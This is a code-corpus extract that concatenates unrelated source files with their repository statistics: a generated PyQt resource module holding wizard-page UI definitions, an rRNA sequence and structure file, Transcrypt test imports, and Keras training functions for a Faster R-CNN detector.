ss>\x0a <widget cla\
ss=\x22QWizardPage\x22\
name=\x22WizardPag\
e\x22>\x0a <property \
name=\x22geometry\x22>\
\x0a <rect>\x0a <\
x>0</x>\x0a <y>0\
</y>\x0a <width>\
400</width>\x0a \
<height>300</hei\
ght>\x0a </rect>\x0a\
</property>\x0a \
<property name=\x22\
windowTitle\x22>\x0a \
<string>WizardP\
age</string>\x0a <\
/property>\x0a <la\
yout class=\x22QVBo\
xLayout\x22 name=\x22v\
erticalLayout\x22>\x0a\
<item>\x0a <w\
idget class=\x22QPu\
shButton\x22 name=\x22\
pushButton\x22>\x0a \
<property name\
=\x22text\x22>\x0a <\
string>9</string\
>\x0a </propert\
y>\x0a </widget>\
\x0a </item>\x0a </\
layout>\x0a </widge\
t>\x0a <resources/>\
\x0a <connections/>\
\x0a</ui>\x0a\
\x00\x00\x02i\
<\
?xml version=\x221.\
0\x22 encoding=\x22UTF\
-8\x22?>\x0a<ui versio\
n=\x224.0\x22>\x0a <class\
>WizardPage</cla\
ss>\x0a <widget cla\
ss=\x22QWizardPage\x22\
name=\x22WizardPag\
e\x22>\x0a <property \
name=\x22geometry\x22>\
\x0a <rect>\x0a <\
x>0</x>\x0a <y>0\
</y>\x0a <width>\
400</width>\x0a \
<height>300</hei\
ght>\x0a </rect>\x0a\
</property>\x0a \
<property name=\x22\
windowTitle\x22>\x0a \
<string>WizardP\
age</string>\x0a <\
/property>\x0a <la\
yout class=\x22QVBo\
xLayout\x22 name=\x22v\
erticalLayout\x22>\x0a\
<item>\x0a <w\
idget class=\x22QPu\
shButton\x22 name=\x22\
pushButton\x22>\x0a \
<property name\
=\x22text\x22>\x0a <\
string>14</strin\
g>\x0a </proper\
ty>\x0a </widget\
>\x0a </item>\x0a <\
/layout>\x0a </widg\
et>\x0a <resources/\
>\x0a <connections/\
>\x0a</ui>\x0a\
\x00\x00\x02i\
<\
?xml version=\x221.\
0\x22 encoding=\x22UTF\
-8\x22?>\x0a<ui versio\
n=\x224.0\x22>\x0a <class\
>WizardPage</cla\
ss>\x0a <widget cla\
ss=\x22QWizardPage\x22\
name=\x22WizardPag\
e\x22>\x0a <property \
name=\x22geometry\x22>\
\x0a <rect>\x0a <\
x>0</x>\x0a <y>0\
</y>\x0a <width>\
400</width>\x0a \
<height>300</hei\
ght>\x0a </rect>\x0a\
</property>\x0a \
<property name=\x22\
windowTitle\x22>\x0a \
<string>WizardP\
age</string>\x0a <\
/property>\x0a <la\
yout class=\x22QVBo\
xLayout\x22 name=\x22v\
erticalLayout\x22>\x0a\
<item>\x0a <w\
idget class=\x22QPu\
shButton\x22 name=\x22\
pushButton\x22>\x0a \
<property name\
=\x22text\x22>\x0a <\
string>12</strin\
g>\x0a </proper\
ty>\x0a </widget\
>\x0a </item>\x0a <\
/layout>\x0a </widg\
et>\x0a <resources/\
>\x0a <connections/\
>\x0a</ui>\x0a\
\x00\x00\x02h\
<\
?xml version=\x221.\
0\x22 encoding=\x22UTF\
-8\x22?>\x0a<ui versio\
n=\x224.0\x22>\x0a <class\
>WizardPage</cla\
ss>\x0a <widget cla\
ss=\x22QWizardPage\x22\
name=\x22WizardPag\
e\x22>\x0a <property \
name=\x22geometry\x22>\
\x0a <rect>\x0a <\
x>0</x>\x0a <y>0\
</y>\x0a <width>\
400</width>\x0a \
<height>300</hei\
ght>\x0a </rect>\x0a\
</property>\x0a \
<property name=\x22\
windowTitle\x22>\x0a \
<string>WizardP\
age</string>\x0a <\
/property>\x0a <la\
yout class=\x22QVBo\
xLayout\x22 name=\x22v\
erticalLayout\x22>\x0a\
<item>\x0a <w\
idget class=\x22QPu\
shButton\x22 name=\x22\
pushButton\x22>\x0a \
<property name\
=\x22text\x22>\x0a <\
string>6</string\
>\x0a </propert\
y>\x0a </widget>\
\x0a </item>\x0a </\
layout>\x0a </widge\
t>\x0a <resources/>\
\x0a <connections/>\
\x0a</ui>\x0a\
\x00\x00\x02h\
<\
?xml version=\x221.\
0\x22 encoding=\x22UTF\
-8\x22?>\x0a<ui versio\
n=\x224.0\x22>\x0a <class\
>WizardPage</cla\
ss>\x0a <widget cla\
ss=\x22QWizardPage\x22\
name=\x22WizardPag\
e\x22>\x0a <property \
name=\x22geometry\x22>\
\x0a <rect>\x0a <\
x>0</x>\x0a <y>0\
</y>\x0a <width>\
400</width>\x0a \
<height>300</hei\
ght>\x0a </rect>\x0a\
</property>\x0a \
<property name=\x22\
windowTitle\x22>\x0a \
<string>WizardP\
age</string>\x0a <\
/property>\x0a <la\
yout class=\x22QVBo\
xLayout\x22 name=\x22v\
erticalLayout\x22>\x0a\
<item>\x0a <w\
idget class=\x22QPu\
shButton\x22 name=\x22\
pushButton\x22>\x0a \
<property name\
=\x22text\x22>\x0a <\
string>7</string\
>\x0a </propert\
y>\x0a </widget>\
\x0a </item>\x0a </\
layout>\x0a </widge\
t>\x0a <resources/>\
\x0a <connections/>\
\x0a</ui>\x0a\
\x00\x00\x02h\
<\
?xml version=\x221.\
0\x22 encoding=\x22UTF\
-8\x22?>\x0a<ui versio\
n=\x224.0\x22>\x0a <class\
>WizardPage</cla\
ss>\x0a <widget cla\
ss=\x22QWizardPage\x22\
name=\x22WizardPag\
e\x22>\x0a <property \
name=\x22geometry\x22>\
\x0a <rect>\x0a <\
x>0</x>\x0a <y>0\
</y>\x0a <width>\
400</width>\x0a \
<height>300</hei\
ght>\x0a </rect>\x0a\
</property>\x0a \
<property name=\x22\
windowTitle\x22>\x0a \
<string>WizardP\
age</string>\x0a <\
/property>\x0a <la\
yout class=\x22QVBo\
xLayout\x22 name=\x22v\
erticalLayout\x22>\x0a\
<item>\x0a <w\
idget class=\x22QPu\
shButton\x22 name=\x22\
pushButton\x22>\x0a \
<property name\
=\x22text\x22>\x0a <\
string>8</string\
>\x0a </propert\
y>\x0a </widget>\
\x0a </item>\x0a </\
layout>\x0a </widge\
t>\x0a <resources/>\
\x0a <connections/>\
\x0a</ui>\x0a\
\x00\x00\x02h\
<\
?xml version=\x221.\
0\x22 encoding=\x22UTF\
-8\x22?>\x0a<ui versio\
n=\x224.0\x22>\x0a <class\
>WizardPage</cla\
ss>\x0a <widget cla\
ss=\x22QWizardPage\x22\
name=\x22WizardPag\
e\x22>\x0a <property \
name=\x22geometry\x22>\
\x0a <rect>\x0a <\
x>0</x>\x0a <y>0\
</y>\x0a <width>\
400</width>\x0a \
<height>300</hei\
ght>\x0a </rect>\x0a\
</property>\x0a \
<property name=\x22\
windowTitle\x22>\x0a \
<string>WizardP\
age</string>\x0a <\
/property>\x0a <la\
yout class=\x22QVBo\
xLayout\x22 name=\x22v\
erticalLayout\x22>\x0a\
<item>\x0a <w\
idget class=\x22QPu\
shButton\x22 name=\x22\
pushButton\x22>\x0a \
<property name\
=\x22text\x22>\x0a <\
string>4</string\
>\x0a </propert\
y>\x0a </widget>\
\x0a </item>\x0a </\
layout>\x0a </widge\
t>\x0a <resources/>\
\x0a <connections/>\
\x0a</ui>\x0a\
\x00\x00\x02h\
<\
?xml version=\x221.\
0\x22 encoding=\x22UTF\
-8\x22?>\x0a<ui versio\
n=\x224.0\x22>\x0a <class\
>WizardPage</cla\
ss>\x0a <widget cla\
ss=\x22QWizardPage\x22\
name=\x22WizardPag\
e\x22>\x0a <property \
name=\x22geometry\x22>\
\x0a <rect>\x0a <\
x>0</x>\x0a <y>0\
</y>\x0a <width>\
400</width>\x0a \
<height>300</hei\
ght>\x0a </rect>\x0a\
</property>\x0a \
<property name=\x22\
windowTitle\x22>\x0a \
<string>WizardP\
age</string>\x0a <\
/property>\x0a <la\
yout class=\x22QVBo\
xLayout\x22 name=\x22v\
erticalLayout\x22>\x0a\
<item>\x0a <w\
idget class=\x22QPu\
shButton\x22 name=\x22\
pushButton\x22>\x0a \
<property name\
=\x22text\x22>\x0a <\
string>1</string\
>\x0a </propert\
y>\x0a </widget>\
\x0a </item>\x0a </\
layout>\x0a </widge\
t>\x0a <resources/>\
\x0a <connections/>\
\x0a</ui>\x0a\
"
qt_resource_name = b"\
\x00\x08\
\x01\x08\x86Y\
\x00w\
\x00i\x00z\x00a\x00r\x00d\x00U\x00I\
\x00\x0f\
\x00\xca\x009\
\x001\
\x005\x00.\x00c\x00o\x00c\x00l\x00u\x00s\x00i\x00o\x00n\x00.\x00u\x00i\
\x00\x0e\
\x06k\xb0\x19\
\x001\
\x003\x00.\x00p\x00r\x00i\x00n\x00t\x00i\x00n\x00g\x00.\x00u\x00i\
\x00\x12\
\x06i\xc3\x19\
\x001\
\x001\x00.\x00t\x00o\x00o\x00l\x00B\x00o\x00x\x00S\x00h\x00r\x00C\x00t\x00.\x00u\
\x00i\
\x00\x0f\
\x04\x80qy\
\x005\
\x00.\x00c\x00o\x00d\x00e\x00D\x00i\x00a\x00l\x00o\x00g\x00.\x00u\x00i\
\x00\x12\
\x09H\xb6\x99\
\x002\
\x00.\x00g\x00r\x00a\x00p\x00h\x00i\x00c\x00s\x00S\x00c\x00e\x00n\x00e\x00.\x00u\
\x00i\
\x00\x11\
\x05$\xde\xf9\
\x001\
\x000\x00.\x00t\x00o\x00o\x00l\x00B\x00o\x00x\x00B\x00t\x00n\x00s\x00.\x00u\x00i\
\
\x00\x16\
\x09\xfbe\x19\
\x003\
\x00.\x00g\x00r\x00a\x00p\x00h\x00i\x00c\x00s\x00S\x00c\x00e\x00n\x00e\x00T\x00e\
\x00x\x00t\x00.\x00u\x00i\
\x00\x0c\
\x05\x1d\xd9y\
\x009\
\x00.\x00t\x00o\x00o\x00l\x00b\x00o\x00x\x00.\x00u\x00i\
\x00\x0e\
\x02\xfd\xff\xf9\
\x001\
\x004\x00.\x00s\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00.\x00u\x00i\
\x00\x11\
\x0f\x8as9\
\x001\
\x002\x00.\x00p\x00r\x00o\x00p\x00e\x00r\x00t\x00y\x00B\x00o\x00x\x00.\x00u\x00i\
\
\x00\x15\
\x06\xa5\xfc\xb9\
\x006\
\x00.\x00g\x00r\x00a\x00p\x00h\x00i\x00c\x00s\x00S\x00c\x00e\x00n\x00e\x00B\x00o\
\x00x\x00.\x00u\x00i\
\x00\x18\
\x09(\x9d\xd9\
\x007\
\x00.\x00g\x00r\x00a\x00p\x00h\x00i\x00c\x00s\x00S\x00c\x00e\x00n\x00e\x00P\x00i\
\x00x\x00m\x00a\x00p\x00.\x00u\x00i\
\x00\x17\
\x0c3~\xf9\
\x008\
\x00.\x00g\x00r\x00a\x00p\x00h\x00i\x00c\x00s\x00S\x00c\x00e\x00n\x00e\x00S\x00h\
\x00r\x00C\x00t\x00.\x00u\x00i\
\x00\x0f\
\x05\xaam9\
\x004\
\x00.\x00t\x00e\x00x\x00t\x00D\x00i\x00a\x00l\x00o\x00g\x00.\x00u\x00i\
\x00\x10\
\x0e\x1c\xd5\x99\
\x001\
\x00.\x00w\x00e\x00l\x00c\x00o\x00m\x00e\x00P\x00a\x00g\x00e\x00.\x00u\x00i\
"
qt_resource_struct = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x0f\x00\x00\x00\x02\
\x00\x00\x00\x16\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x01L\x00\x00\x00\x00\x00\x01\x00\x00\x13d\
\x00\x00\x00\x86\x00\x00\x00\x00\x00\x01\x00\x00\x07G\
\x00\x00\x01.\x00\x00\x00\x00\x00\x01\x00\x00\x10\xf8\
\x00\x00\x00\xd4\x00\x00\x00\x00\x00\x01\x00\x00\x0c\x1f\
\x00\x00\x020\x00\x00\x00\x00\x00\x01\x00\x00\x1f\x82\
\x00\x00\x00\x5c\x00\x00\x00\x00\x00\x01\x00\x00\x04\xda\
\x00\x00\x00:\x00\x00\x00\x00\x00\x01\x00\x00\x02m\
\x00\x00\x01\x96\x00\x00\x00\x00\x00\x01\x00\x00\x18>\
\x00\x00\x01\xc6\x00\x00\x00\x00\x00\x01\x00\x00\x1a\xaa\
\x00\x00\x00\xaa\x00\x00\x00\x00\x00\x01\x00\x00\x09\xb3\
\x00\x00\x00\xfc\x00\x00\x00\x00\x00\x01\x00\x00\x0e\x8c\
\x00\x00\x01\xfc\x00\x00\x00\x00\x00\x01\x00\x00\x1d\x16\
\x00\x00\x02T\x00\x00\x00\x00\x00\x01\x00\x00!\xee\
\x00\x00\x01n\x00\x00\x00\x00\x00\x01\x00\x00\x15\xd1\
"
def qInitResources():
QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
| 22.34153
| 96
| 0.643818
| 2,565
| 16,354
| 4.097856
| 0.08499
| 0.07535
| 0.058225
| 0.045666
| 0.892779
| 0.883836
| 0.881267
| 0.871849
| 0.834174
| 0.820188
| 0
| 0.180604
| 0.125474
| 16,354
| 731
| 97
| 22.372093
| 0.554328
| 0.011312
| 0
| 0.863128
| 0
| 0.044693
| 0
| 0
| 0
| 0
| 0.000495
| 0
| 0
| 1
| 0.002793
| false
| 0
| 0.001397
| 0
| 0.00419
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b690a721a794eb402550800beb7ea64672b5a775
| 3,222
|
py
|
Python
|
rRNA_16S.py
|
everyday847/vienna_guided_mc
|
549ea00a8bf56e7b9556b177cb689f363de90780
|
[
"MIT"
] | null | null | null |
rRNA_16S.py
|
everyday847/vienna_guided_mc
|
549ea00a8bf56e7b9556b177cb689f363de90780
|
[
"MIT"
] | null | null | null |
rRNA_16S.py
|
everyday847/vienna_guided_mc
|
549ea00a8bf56e7b9556b177cb689f363de90780
|
[
"MIT"
] | null | null | null |
seq_16S = "AAAUUGAAGAGUUUGAUCAUGGCUCAGAUUGAACGCUGGCGGCAGGCCUAACACAUGCAAGUCGAACGGUAACAGGAAGAAGCUUGCUUCUUUGCUGACGAGUGGCGGACGGGUGAGUAAUGUCUGGGAAACUGCCUGAUGGAGGGGGAUAACUACUGGAAACGGUAGCUAAUACCGCAUAACGUCGCAAGACCAAAGAGGGGGACCUUCGGGCCUCUUGCCAUCGGAUGUGCCCAGAUGGGAUUAGCUAGUAGGUGGGGUAACGGCUCACCUAGGCGACGAUCCCUAGCUGGUCUGAGAGGAUGACCAGCCACACUGGAACUGAGACACGGUCCAGACUCCUACGGGAGGCAGCAGUGGGGAAUAUUGCACAAUGGGCGCAAGCCUGAUGCAGCCAUGCCGCGUGUAUGAAGAAGGCCUUCGGGUUGUAAAGUACUUUCAGCGGGGAGGAAGGGAGUAAAGUUAAUACCUUUGCUCAUUGACGUUACCCGCAGAAGAAGCACCGGCUAACUCCGUGCCAGCAGCCGCGGUAAUACGGAGGGUGCAAGCGUUAAUCGGAAUUACUGGGCGUAAAGCGCACGCAGGCGGUUUGUUAAGUCAGAUGUGAAAUCCCCGGGCUCAACCUGGGAACUGCAUCUGAUACUGGCAAGCUUGAGUCUCGUAGAGGGGGGUAGAAUUCCAGGUGUAGCGGUGAAAUGCGUAGAGAUCUGGAGGAAUACCGGUGGCGAAGGCGGCCCCCUGGACGAAGACUGACGCUCAGGUGCGAAAGCGUGGGGAGCAAACAGGAUUAGAUACCCUGGUAGUCCACGCCGUAAACGAUGUCGACUUGGAGGUUGUGCCCUUGAGGCGUGGCUUCCGGAGCUAACGCGUUAAGUCGACCGCCUGGGGAGUACGGCCGCAAGGUUAAAACUCAAAUGAAUUGACGGGGGCCCGCACAAGCGGUGGAGCAUGUGGUUUAAUUCGAUGCAACGCGAAGAACCUUACCUGGUCUUGACAUCCACGGAAGUUUUCAGAGAUGAGAAUGUGCCUUCGGGAACCGUGAGACAGGUGCUGCAUGGCUGUCGUCAGCUCGUGUUGUGAAAUGUUGGGUUAAGUCCCGCAACGAGCGCAACCCUUAUCCUUUGUUGCCAGCGGUCCGGCCGGGAACUCAAAGGAGACUGCCAGUGAUAAACUGGAGGAAGGUGGGGAUGACGUCAAGUCAUCAUGGCCCUUACGACCAGGGCUACACACGUGCUACAAUGGCGCAUACAAAGAGAAGCGACCUCGCGAGAGCAAGCGGACCUCAUAAAGUGCGUCGUAGUCCGGAUUGGAGUCUGCAACUCGACUCCAUGAAGUCGGAAUCGCUAGUAAUCGUGGAUCAGAAUGCCACGGUGAAUACGUUCCCGGGCCUUGUACACACCGCCCGUCACACCAUGGGAGUGGGUUGCAAAAGAAGUAGGUAGCUUAACCUUCGGGAGGGCGCUUACCACUUUGUGAUUCAUGACUGGGGUGAAGUCGUAACAAGGUAACCGUAGGGGAACCUGCGGUUGGAUCACCUCCUUA"
struct_16S = "........((((..[.[[[..)))).((((.(((((..(((((((((....(((.(((..(((..((.((..(((.(..(((....)))..)..)))))..)))))......(((......(((((((..((...(((((((.(.((.....((((((....))))))......)).).....(((....)))....((((((..(......))))))).)))))))..)).)))))))(((....(((..((((((((.......)))))))))))......)))..((((((((....))))...))))))).(((((............))))).((((....))))...)))))).).....(.(((...(((((....)))).))))).)).))))))..((((......((((....)))).....))))..((.(((((...(..(.((((((((.......)))))))).)...)....)))))....)).((((([[[...(((((.....((.]]])).......))))))))))..)))))))))..........((([[...(.((((...(((.(((((((.((((((((((......((((((.....))))))....))))))))..)))))))))..(((((((((...((((((((...((((((((...((........))......))))))))...).......((....)).)))))))..)))).))))..))))...))))....((((((...((...((((.........))))...))))))))......{...((((((..((((((((((((.....))))))))))))...((..]])).....)))))))))).(((......((((....))))....)))...]]].](((((.(((((((.((..(((((..((((((((((......((........))..........(((((((..(...(((((((.....(..........).......(....)...))))).))).((.(((...((((((.(....(((((((((....)))...(((......)))...)))))).....((((.(((((((...((..((.......))))....)))))))..(..(((((.....))))).....)..)))).....).).)))...)).)))))....)))))))...)).)))))))).(...((((((......(((..((...(((....)))...))....)))......))))))......(....(((((((........)))))))....)..)..))))).....(((((((.........)))))))......))...)))))))))).))..(.(..((.(.((((.(((..((((((((((((....((((((.((((..((....)).))))))))))...))))))))))))..))).))))..).))...)..)..(((((((((....)))))))))}.............".replace('[','.').replace(']','.').replace('{', '.').replace('}', '.').replace('<', '.').replace('>', '.')
| 1,074
| 1,663
| 0.496896
| 11
| 3,222
| 145.363636
| 0.454545
| 0.043777
| 0.052533
| 0.052533
| 0.026266
| 0
| 0
| 0
| 0
| 0
| 0
| 0.001246
| 0.004035
| 3,222
| 2
| 1,664
| 1,611
| 0.49704
| 0
| 0
| 0
| 0
| 0
| 0.960894
| 0.957169
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
fcbb02e01ff414e958efba19ea6eed17c0bdeed5
| 142
|
py
|
Python
|
mp_sort/virtenv/lib/python3.6/site-packages/transcrypt/development/automated_tests/transcrypt/div_pulls/pull575_reexport_modules/reexporter/__init__.py
|
ang-jason/fip_powerx_mini_projects-foxtrot
|
37e3671969b516369e2d1c7cab5890b75c489f56
|
[
"MIT"
] | 2,200
|
2016-10-12T16:47:13.000Z
|
2022-03-30T16:40:35.000Z
|
mp_sort/virtenv/lib/python3.6/site-packages/transcrypt/development/automated_tests/transcrypt/div_pulls/pull575_reexport_modules/reexporter/__init__.py
|
ang-jason/fip_powerx_mini_projects-foxtrot
|
37e3671969b516369e2d1c7cab5890b75c489f56
|
[
"MIT"
] | 672
|
2016-10-12T16:36:48.000Z
|
2022-03-25T00:57:04.000Z
|
mp_sort/virtenv/lib/python3.6/site-packages/transcrypt/development/automated_tests/transcrypt/div_pulls/pull575_reexport_modules/reexporter/__init__.py
|
ang-jason/fip_powerx_mini_projects-foxtrot
|
37e3671969b516369e2d1c7cab5890b75c489f56
|
[
"MIT"
] | 230
|
2016-10-20T14:31:40.000Z
|
2022-03-16T15:57:15.000Z
|
from div_pulls.pull575_reexport_modules.reexporter.html5.html5 import *
from div_pulls.pull575_reexport_modules.reexporter.html5 import ext
| 47.333333
| 72
| 0.873239
| 20
| 142
| 5.9
| 0.5
| 0.118644
| 0.20339
| 0.322034
| 0.830508
| 0.830508
| 0.830508
| 0.830508
| 0
| 0
| 0
| 0.068182
| 0.070423
| 142
| 2
| 73
| 71
| 0.825758
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
fcdad3b8b4c3114bd9e639c4f4e0571955e195a4
| 10,251
|
py
|
Python
|
faster_rcnn/train_util.py
|
Kelicious/faster_rcnn
|
fde1a2f342855b8a3b6c1a54878e59d29102a26d
|
[
"MIT"
] | 18
|
2018-05-13T14:50:03.000Z
|
2022-02-23T14:27:17.000Z
|
faster_rcnn/train_util.py
|
Kelicious/faster_rcnn
|
fde1a2f342855b8a3b6c1a54878e59d29102a26d
|
[
"MIT"
] | 3
|
2018-05-15T08:46:10.000Z
|
2020-03-17T12:46:31.000Z
|
faster_rcnn/train_util.py
|
Kelicious/faster_rcnn
|
fde1a2f342855b8a3b6c1a54878e59d29102a26d
|
[
"MIT"
] | 15
|
2018-05-13T14:50:24.000Z
|
2022-02-24T09:50:07.000Z
|
import random
import timeit
from keras import backend as K
from loss_functions import cls_loss_rpn, bbreg_loss_rpn, cls_loss_det, bbreg_loss_det
from shared_constants import DEFAULT_NUM_ITERATIONS, DEFAULT_LEARN_RATE
def train_rpn(rpn_model, images, training_manager, optimizer, phases=[[DEFAULT_NUM_ITERATIONS, DEFAULT_LEARN_RATE]],
save_frequency=None, save_weights_dest=None, save_model_dest=None):
"""
Trains a region proposal network.
:param rpn_model: Keras model for the rpn to be trained.
:param images: sequence of shapes.Image objects used to train the network.
:param training_manager: rpn_util.RpnTrainingManager to produce training inputs from images.
:param optimizer: keras.optimizers.Optimizer implementation to be used. Doesn't need a preconfigured learning rate.
:param phases: list of lists specifying the learning rate schedule, e.g. [[1000, 1e-3], [100, 1e-4]] 1000 iterations
with learning rate 1e-3 followed by 100 iterations with learning rate 1e-4.
:param save_frequency: positive integer specifying how many iterations occur between saving the model's state. Leave
it as None to disable saving during training.
:param save_weights_dest: the path to save model weights as an h5 file after each save_frequency iterations.
:param save_model_dest: the path to save the Keras model as an h5 file after each save_frequency iterations.
:return: the rpn passed in.
"""
num_train = len(images)
anchors_per_loc = len(training_manager.anchor_dims)
for phase_num, phase in enumerate(phases):
num_iterations, learn_rate = phase
optimizer.lr = K.variable(learn_rate, name='lr')
rpn_model.compile(optimizer=optimizer, loss=[cls_loss_rpn(anchors_per_loc=anchors_per_loc),
bbreg_loss_rpn(anchors_per_loc=anchors_per_loc)])
print("Starting phase {} of training: {} iterations with learning rate {}".format(
phase_num, num_iterations, learn_rate))
for i in range(num_iterations):
img_idx = (i + num_iterations * phase_num) % num_train
if img_idx == 0:
random.shuffle(images)
img = images[img_idx]
print('Starting phase {} iteration {} with learn rate {}, training on image {}, flipped status: {}'.format(
phase_num, i, learn_rate, img.name, img.flipped))
print('img size: {}x{}'.format(img.width, img.height))
batched_img = training_manager.batched_image(img)
y_class, y_bbreg = training_manager.rpn_y_true(img)
start_time = timeit.default_timer()
loss_rpn = rpn_model.train_on_batch(batched_img, [y_class, y_bbreg])
print("model_rpn.train_on_batch time: ", timeit.default_timer() - start_time)
print('loss_rpn: {}'.format(loss_rpn))
if save_frequency and i % save_frequency == 0:
if save_weights_dest != None:
rpn_model.save_weights(save_weights_dest)
print('Saved rpn weights to {}'.format(save_weights_dest))
if save_model_dest != None:
rpn_model.save(save_model_dest)
print('Saved rpn model to {}'.format(save_model_dest))
return rpn_model
def train_detector_step2(detector, images, training_manager, optimizer,
phases=[[DEFAULT_NUM_ITERATIONS, DEFAULT_LEARN_RATE]], save_frequency=None,
save_weights_dest=None, save_model_dest=None):
"""
Trains a Fast R-CNN object detector for step 2 of the 4-step alternate training scheme in the paper.
:param detector: Keras model for the detector module used in step 2 of training. The model should accepts images
and regions as inputs.
:param images: sequence of shapes.Image objects used to train the network.
:param training_manager: det_util.DetTrainingManager object produce training inputs from images.
:param optimizer: keras.optimizers.Optimizer implementation to be used. Doesn't need a preconfigured learning rate.
:param phases: list of lists specifying the learning rate schedule, e.g. [[1000, 1e-3], [100, 1e-4]] 1000 iterations
with learning rate 1e-3 followed by 100 iterations with learning rate 1e-4.
:param save_frequency: positive integer specifying how many iterations occur between saving the model's state. Leave
it as None to disable saving during training.
:param save_weights_dest: the path to save model weights as an h5 file after each save_frequency iterations. Leave
this as None to disable weight saving during training.
:param save_model_dest: the path to save the Keras model as an h5 file after each save_frequency iterations. Leave
this as None to disable model saving during training.
:return: the detector passed in.
"""
num_train = len(images)
num_classes = len(training_manager.class_mapping) - 1
for phase_num, phase in enumerate(phases):
num_iterations, learn_rate = phase
optimizer.lr = K.variable(learn_rate, name='lr')
detector.compile(optimizer=optimizer, loss=[cls_loss_det, bbreg_loss_det(num_classes)])
print("Starting phase {} of training: {} iterations with learning rate {}".format(
phase_num, num_iterations, learn_rate))
for i in range(num_iterations):
img_idx = (i + num_iterations * phase_num) % num_train
if img_idx == 0:
random.shuffle(images)
img = images[img_idx]
print('Starting phase {} iteration {} with learn rate {}, training on image {}, flipped status: {}'.format(
phase_num, i, learn_rate, img.name, img.flipped))
batched_img, rois, y_class_num, y_transform = training_manager.get_training_input(img)
if rois is None:
print("Found no rois for this image")
continue
import timeit
start_time = timeit.default_timer()
loss_frcnn = detector.train_on_batch([batched_img, rois], [y_class_num, y_transform])
print("model_frcnn.train_on_batch time: ", timeit.default_timer() - start_time)
print('loss_frcnn: {}'.format(loss_frcnn))
if save_frequency and i > 0 and i % save_frequency == 0:
if save_weights_dest != None:
detector.save_weights(save_weights_dest)
print('Saved detector weights to {}'.format(save_weights_dest))
if save_model_dest != None:
detector.save(save_model_dest)
print('Saved detector model to {}'.format(save_model_dest))
return detector
def train_detector_step4(detector, images, training_manager, optimizer,
phases=[[DEFAULT_NUM_ITERATIONS, DEFAULT_LEARN_RATE]], save_frequency=None,
save_weights_dest=None, save_model_dest=None):
"""
Trains a Fast R-CNN object detector for step 4 of the 4-step alternate training scheme in the paper.
:param detector: Keras model for the detector module used in step 4 of training. The module should accept images'
convolutional features and regions as inputs.
:param images: sequence of shapes.Image objects used to train the network.
:param training_manager: det_util.DetTrainingManager object produce training inputs from images.
:param optimizer: keras.optimizers.Optimizer implementation to be used. Doesn't need a preconfigured learning rate.
:param phases: list of lists specifying the learning rate schedule, e.g. [[1000, 1e-3], [100, 1e-4]] 1000 iterations
with learning rate 1e-3 followed by 100 iterations with learning rate 1e-4.
:param save_frequency: positive integer specifying how many iterations occur between saving the model's state. Leave
it as None to disable saving during training.
:param save_weights_dest: the path to save model weights as an h5 file after each save_frequency iterations. Leave
this as None to disable weight saving during training.
:param save_model_dest: the path to save the Keras model as an h5 file after each save_frequency iterations. Leave
this as None to disable model saving during training.
:return: the detector passed in.
"""
num_train = len(images)
num_classes = len(training_manager.class_mapping) - 1
for phase_num, phase in enumerate(phases):
num_iterations, learn_rate = phase
optimizer.lr = K.variable(learn_rate, name='lr')
detector.compile(optimizer=optimizer, loss=[cls_loss_det, bbreg_loss_det(num_classes)])
print("Starting phase {} of training: {} iterations with learning rate {}".format(
phase_num, num_iterations, learn_rate))
for i in range(num_iterations):
img_idx = (i + num_iterations * phase_num) % num_train
if img_idx == 0:
random.shuffle(images)
img = images[img_idx]
print('Starting phase {} iteration {} with learn rate {}, training on image {}, flipped status: {}'.format(
phase_num, i, learn_rate, img.name, img.flipped))
conv_features, rois, y_class_num, y_transform = training_manager.get_training_input(img)
if rois is None:
print("Found no training samples for this image")
continue
import timeit
start_time = timeit.default_timer()
loss_frcnn = detector.train_on_batch([conv_features, rois], [y_class_num, y_transform])
print("model_frcnn.train_on_batch time: ", timeit.default_timer() - start_time)
print('loss_frcnn: {}'.format(loss_frcnn))
if save_frequency and i > 0 and i % save_frequency == 0:
if save_weights_dest != None:
detector.save_weights(save_weights_dest)
print('Saved detector weights to {}'.format(save_weights_dest))
if save_model_dest != None:
detector.save(save_model_dest)
print('Saved detector model to {}'.format(save_model_dest))
return detector
| 52.840206
| 120
| 0.676324
| 1,377
| 10,251
| 4.831518
| 0.126362
| 0.025703
| 0.033819
| 0.035172
| 0.908613
| 0.896588
| 0.870585
| 0.860364
| 0.84383
| 0.84383
| 0
| 0.011657
| 0.246805
| 10,251
| 194
| 121
| 52.840206
| 0.850019
| 0.342015
| 0
| 0.731481
| 0
| 0
| 0.129737
| 0.011614
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027778
| false
| 0
| 0.064815
| 0
| 0.12037
| 0.194444
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
